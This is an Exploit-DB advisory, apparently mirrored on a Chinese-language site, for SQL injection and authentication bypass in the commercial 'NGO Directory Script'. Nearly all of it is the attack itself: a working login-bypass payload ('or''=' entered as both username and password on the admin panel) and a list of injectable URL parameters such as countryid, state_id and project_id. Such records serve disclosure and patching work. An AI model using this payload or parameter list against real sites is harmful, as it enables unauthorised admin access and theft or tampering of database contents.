NGO Directory Script – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-01-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41103/
  • # # # # # 
    # Vulnerability: SQL Injection + Authentication Bypass
    # Date: 18.01.2017
    # Vendor Homepage: http://www.scriptgiant.com/
    # Script Name: NGO Directory Script
    # Script Buy Now: http://www.popularclones.com/products/NGO-Directory-Script
    # Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Mail : ihsan[beygir]ihsan[nokta]net
    # # # # #
    # Authentication Bypass :
    # http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/admin/add_country.php?countryid=[SQL]
    # http://localhost/[PATH]/admin/states_add.php?state_id=[SQL]
    # http://localhost/[PATH]/admin/cities_add.php?cityid=[SQL]
    # http://localhost/[PATH]/admin/request_add.php?request_id=[SQL]
    # http://localhost/[PATH]/admin/good_category_add.php?goods_cat_id=[SQL]
    # http://localhost/[PATH]/details_religios.html?project_id=[SQL]
    # http://localhost/[PATH]/details.html?project_id=[SQL]
    # E.t.c.... Other files, too. SQL There are security vulnerabilities.
    # # # # #